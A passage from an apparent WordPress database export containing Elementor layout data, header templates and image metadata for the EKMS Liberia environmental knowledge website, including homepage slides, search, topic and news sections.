More\",\"background_color\":\"\",\"_id\":\"11d0065\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_marine.jpg\",\"id\":2158,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\",\"zoom_direction\":\"out\",\"background_overlay\":\"yes\"},{\"heading\":\"Convention to Combat Desertification\",\"description\":\"A sole legally binding international agreement linking environment and development to sustainable land management.\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"3d86158\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/slide_ccd.jpg\",\"id\":14,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\"}],\"slides_height\":{\"unit\":\"px\",\"size\":370,\"sizes\":[]},\"content_animation\":\"fadeInLeft\"},\"elements\":[],\"widgetType\":\"slides\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3832980\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":120,\"sizes\":[]},\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8ce7e10\"}],\"background_background\":\"classic\",\"background_color\":\"#0A3C1173\",\"margin\":{\"unit\":\"px\",\"top\":\"-30\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"f8bb5a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"db42395\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a3ddb70\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"ecc2093\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":12.2370000000000000994759830064140260219573974609375},\"elements\":[],\"isInner\":true},{\"id\":\"73e3c60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":77.0799999999999982946974341757595539093017578125},\"elements\":[{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\",\"search_source\":[\"document\",\"institution\",\"mea_resource\",\"project_resource\",\"related_topic\"]},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":true},{\"id\":\"e733e70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":10.3469999999999995310417943983338773250579833984375},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\"}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Select a Topic\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\"}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\"}],\"reverse_order_tablet\":\"reverse-tablet\",\"reverse_order_mobile\":\"reverse-mobile\",\"hide_mobile\":\"hidden-phone\"},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\"}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\"}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Document\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore the EKMS Documents Database.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-database\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\"}],\"background_background\":\"classic\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Latest News & Blogs\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"339607e\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"684051a\",\"elType\":\"widget\",\"settings\":{\"number\":4,\"columns\":\"4\",\"equal_height_cols\":\"true\",\"title_trimmed\":\"yes\",\"title_length\":10,\"title_trimmed_ending_text\":\"...\",\"excerpt_length\":10,\"show_terms\":\"yes\",\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"537281f\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"821cf97\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_bg\":\"rgba(0,100,0,0.59)\",\"content_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"title_typography_font_weight\":\"900\",\"excerpt_color\":\"rgba(255,255,255,0.75)\",\"excerpt_typography_typography\":\"custom\",\"excerpt_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"terms_link_typography_typography\":\"custom\",\"terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"terms_link_bg_color\":\"#6ec1e4\",\"show_author\":\"\",\"show_comments\":\"\",\"arrows\":\"\",\"autoplay\":\"\",\"infinite\":\"\",\"meta_title_related_position\":\"after\",\"meta_content_related_position\":\"after\",\"title_color_hover\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-posts\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Read All News & Blogs\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/news-and-blogs\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false}]'),(27192,3949,'_elementor_version','3.4.0'),(27193,3949,'_elementor_template_type','wp-page'),(27194,3949,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(27196,3949,'_elementor_pro_version','3.3.6'),(27209,3950,'_wp_attached_file','2021/08/ekms_logo.jpg'),(27210,3950,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:759;s:6:\"height\";i:681;s:4:\"file\";s:21:\"2021/08/ekms_logo.jpg\";s:5:\"sizes\";a:12:{s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"ekms_logo-300x269.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:269;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"ekms_logo-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:21:\"ekms_logo-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:20:\"ekms_logo-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:21:\"ekms_logo-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:21:\"ekms_logo-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:21:\"ekms_logo-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:21:\"ekms_logo-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-l\";a:4:{s:4:\"file\";s:21:\"ekms_logo-759x650.jpg\";s:5:\"width\";i:759;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:21:\"ekms_logo-600x538.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:538;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:21:\"ekms_logo-640x640.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"kava-thumb-justify-2\";a:4:{s:4:\"file\";s:21:\"ekms_logo-759x640.jpg\";s:5:\"width\";i:759;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(27211,3951,'_elementor_edit_mode','builder'),(27212,3951,'_elementor_template_type','header'),(27213,3951,'_elementor_version','3.3.1'),(27214,3951,'_elementor_pro_version','3.3.6'),(27215,3951,'_wp_page_template','default'),(27216,3951,'_elementor_data','[{\"id\":\"226cf47\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\",\"z_index\":10,\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"46f8c6a\"}]},\"elements\":[{\"id\":\"bb01e59\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"3363c15\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"content_position\":\"bottom\",\"structure\":\"30\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fa03357\"}]},\"elements\":[{\"id\":\"3569957\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":14.7690000000000001278976924368180334568023681640625},\"elements\":[{\"id\":\"7fbf46e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/08\\/ekms_logo.jpg\",\"id\":3950,\"alt\":\"\",\"source\":\"library\"},\"link_to\":\"custom\",\"__dynamic__\":{\"link\":\"[elementor-tag id=\\\"e547e9d\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"d99ac5b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":62.9849999999999994315658113919198513031005859375},\"elements\":[{\"id\":\"21163b9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Environmental Knowledge <br>Management System\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Rubik\",\"typography_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true},{\"id\":\"ed9ad02\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":21.91199999999999903366187936626374721527099609375,\"content_position\":\"center\",\"align\":\"center\",\"space_between_widgets\":5},\"elements\":[{\"id\":\"1871aba\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Join us to help grow <br \\/>the EKMS Community<\\/p>\",\"align\":\"center\",\"text_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ece91c3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Signup, It\'s free!\",\"align\":\"center\",\"size\":\"xs\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"700\",\"background_color\":\"#10CD2AB8\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"c6086e6\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#0A3C11\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e9d09e5\"}]},\"elements\":[{\"id\":\"e0c2519\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"647b188\",\"elType\":\"widget\",\"settings\":{\"menu\":\"main_menu\",\"align_items\":\"left\",\"pointer\":\"none\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_family\":\"Roboto\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":17,\"sizes\":[]},\"menu_typography_font_weight\":\"400\",\"color_menu_item\":\"#FFFFFF\",\"color_menu_item_hover\":\"#D1E4DD\",\"pointer_color_menu_item_hover\":\"#D1E4DD\",\"color_dropdown_item\":\"#0A3C11\",\"color_dropdown_item_hover\":\"#FFFFFF\",\"background_color_dropdown_item_hover\":\"#0A3C11\",\"custom_css\":\".sub-menu-toggle {display:none;}\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(27218,3951,'_elementor_conditions','a:1:{i:0;s:15:\"include/general\";}'),(27222,3952,'_elementor_edit_mode','builder'),(27223,3952,'_elementor_template_type','header'),(27224,3952,'_elementor_version','3.4.0'),(27225,3952,'_elementor_pro_version','3.3.6'),(27226,3952,'_wp_page_template','default'),(27227,3952,'_elementor_data','[{\"id\":\"226cf47\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\",\"z_index\":10,\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"46f8c6a\"}]},\"elements\":[{\"id\":\"bb01e59\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"3363c15\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"content_position\":\"middle\",\"structure\":\"30\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fa03357\"}]},\"elements\":[{\"id\":\"3569957\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":14.7690000000000001278976924368180334568023681640625},\"elements\":[{\"id\":\"7fbf46e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/08\\/ekms_logo.jpg\",\"id\":3950,\"alt\":\"\",\"source\":\"library\"},\"link_to\":\"custom\",\"__dynamic__\":{\"link\":\"[elementor-tag id=\\\"e547e9d\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"d99ac5b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":62.9849999999999994315658113919198513031005859375},\"elements\":[{\"id\":\"21163b9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Environmental Knowledge <br>Management System\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Rubik\",\"typography_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true},{\"id\":\"ed9ad02\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":21.91199999999999903366187936626374721527099609375,\"content_position\":\"center\",\"align\":\"center\",\"space_between_widgets\":5},\"elements\":[{\"id\":\"1871aba\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Join us to help grow <br \\/>the EKMS Community<\\/p>\",\"align\":\"center\",\"text_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ece91c3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Signup, It\'s free!\",\"align\":\"center\",\"size\":\"xs\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"700\",\"background_color\":\"#10CD2AB8\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"c6086e6\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#0A3C11\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e9d09e5\"}]},\"elements\":[{\"id\":\"e0c2519\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"647b188\",\"elType\":\"widget\",\"settings\":{\"menu\":\"main_menu\",\"align_items\":\"left\",\"pointer\":\"none\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_family\":\"Roboto\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":17,\"sizes\":[]},\"menu_typography_font_weight\":\"400\",\"color_menu_item\":\"#FFFFFF\",\"color_menu_item_hover\":\"#D1E4DD\",\"pointer_color_menu_item_hover\":\"#D1E4DD\",\"color_dropdown_item\":\"#0A3C11\",\"color_dropdown_item_hover\":\"#FFFFFF\",\"background_color_dropdown_item_hover\":\"#0A3C11\",\"custom_css\":\".sub-menu-toggle {display:none;}\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(38608,1872,'_elementor_css','a:7:{s:4:\"time\";i:1770885026;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:5:\"empty\";i:0;s:0:\"\";s:3:\"css\";s:0:\"\";}'),(27229,3952,'_elementor_conditions','a:1:{i:0;s:15:\"include/general\";}'),(27233,3953,'_elementor_edit_mode','builder'),(27234,3953,'_elementor_template_type','header'),(27235,3953,'_elementor_version','3.4.0'),(27236,3953,'_elementor_pro_version','3.3.6'),(27237,3953,'_wp_page_template','default'),(27238,3953,'_elementor_data','[{\"id\":\"226cf47\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\",\"z_index\":10,\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\